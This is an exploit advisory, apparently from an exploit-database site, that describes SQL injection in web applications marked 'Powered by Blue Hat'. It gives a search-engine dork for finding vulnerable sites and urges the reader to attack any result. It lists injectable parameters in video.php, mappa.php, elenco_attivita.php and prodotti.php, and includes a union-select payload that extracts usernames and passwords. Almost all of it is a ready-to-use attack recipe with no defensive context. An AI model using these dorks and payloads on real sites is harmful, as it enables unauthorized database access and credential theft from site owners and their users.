1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 |
#(+)Exploit Title: Powered by Blue Hat Sensitive Database Disclosure Vulnerability #(+)Author : ^Xecuti0n3r #(+) Date: 12.04.2011 #(+) Hour: 13:37 PM #(+) E-mail:xecuti0n3r()yahoo.com #(+) dork: intext:"Powered by Blue Hat" #(+) Category: Web Apps [SQli] ____________________________________________________________________ ____________________________________________________________________ Choose any site that comes up when you enter the dork intext:"Powered by Blue Hat" in search engine *SQL injection Vulnerability* #[+]http://site.com/video.php?id_att='111 #[+]http://site.com/video.php?id_att=[SQLI] #[+]http://site.com/mappa.php?id_att='2121 #[+]http://site.com/mappa.php?id_att=[SQLI] #[+]http://site.com/elenco_attivita.php?id_cat='101 #[+]http://site.com/elenco_attivita.php?id_cat=[SQLI] #[+]http://site.com/prodotti.php?id='6 #[+]http://site.com/prodotti.php?id=[SQLI] #[+]http://site.com/prodotti.php?id=-6+union+select+1,concat(username,0x3a,password)+from+utenti ____________________________________________________________________ ____________________________________________________________________ ######################################################################## (+)Exploit Coded by: ^Xecuti0n3r (+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r ######################################################################## |